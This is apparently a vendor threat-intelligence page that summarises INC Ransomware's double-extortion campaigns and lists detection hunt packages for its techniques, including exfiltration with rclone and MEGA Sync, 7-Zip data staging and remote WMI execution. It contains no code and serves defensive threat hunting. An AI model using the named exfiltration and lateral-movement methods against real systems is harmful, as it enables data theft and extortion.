Threat Overview - INC Ransomware
INC Ransomware is a malware variant that was first observed in July/August of 2023, and has since been a part of major disruptions mostly in North America and Europe. Recently in August 2024, they have been tied to the attack and disruption of the major healthcare network McLaren Health Care - affecting IT infrastructure/devices and phone systems. The threat group, known by the same name as the ransomware (INC Ransom group), has typically been financially motivated and employs a double-extortion system after encrypting targeted systems - double-extortion referring to the exfiltration of proprietary data and threatening to release it to the public if the victim does not adhere to demands. The techniques that are utilized by INC Ransomware are similar to other Ransomware variants, with related methods of initial access, reconnaissance, lateral movement and ultimately the encryption of the system - furthermore, newly discovered Lynx ransomware has been observed in July 2024 to potentially be a fork of the malware strain. INC Ransomware is considered to be an active threat, and thus poses a significant and present risk that organizations should ascertain and be prepared for
Get your FREE Community Account today on the HUNTER471 Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms.
GET YOUR FREE HUNTER471 COMMUNITY ACCOUNT!
Hunt Packages
7-zip Archive Collection with File Exclusions
This Threat Hunt package identifies malicious activity where attackers leverage 7-Zip to collect and compress files prior to exfiltration. The method involves selectively including files of interest while excluding common, non-sensitive file types such as executables, videos, and virtual disk files. By using 7-Zip\u2019s compression capabilities with exclusion filters, adversaries can gather only critical or high-value data for exfiltration while avoiding files that might attract attention or bloat the payload. This tactic highlights the importance of monitoring file compression activities, especially when certain file types are deliberately excluded.
First Time Script Or Sysinternals Execution - Registry Key Modification
This package is designed to capture the first time execution of scripts and sysinternal executable. If it is the first time running some scripts or most Windows Sysinternal programs, the user much accept the End User License Agreement. This can be done in two ways: 1) Issue the -accepteula commandline argument OR 2) Click agree when the pop-up prompts you. Either way, when this happens a registry key is modified to save these changes and next time the program is run the prompt will not pop up.
Potential Exfiltration - Common Rclone Arguments
This will identify processes executed with common arguments associated with rclone activity used to exfiltrate.
Advanced IP Scanner Tool Utilization
This Threat Hunt package identifies instances where Advanced IP Scanner tool was used within a target environment, which may be leveraged by malicious actors to perform network discovery actions. This package can also identify activity even if the execution is run as a portable exe instead of an installation of the tool.
Remote WMI Command Attempt
This hunt searches for wmic.exe being launched with parameters to operate on remote systems. This could uncover an attacker abusing WMI functionality, in order to potentially perform remote executions or to simply gather information.
Remote Process Instantiation via WMI
This use case is meant to identify wmic.exe being launched with parameters to spawn a process on a remote system.
MEGA Sync Installation
This Threat Hunt package identifies instances where MEGA Sync installations are present within a target environment, which may be leveraged by malicious actors to exfiltrate sensitive data. MEGA Sync, a cloud storage synchronization tool, can be exploited by adversaries to quietly transfer files from compromised systems to external MEGA accounts, bypassing traditional security controls. This package focuses on detecting unauthorized installations and configurations of MEGA Sync that could indicate active or potential data exfiltration activities.
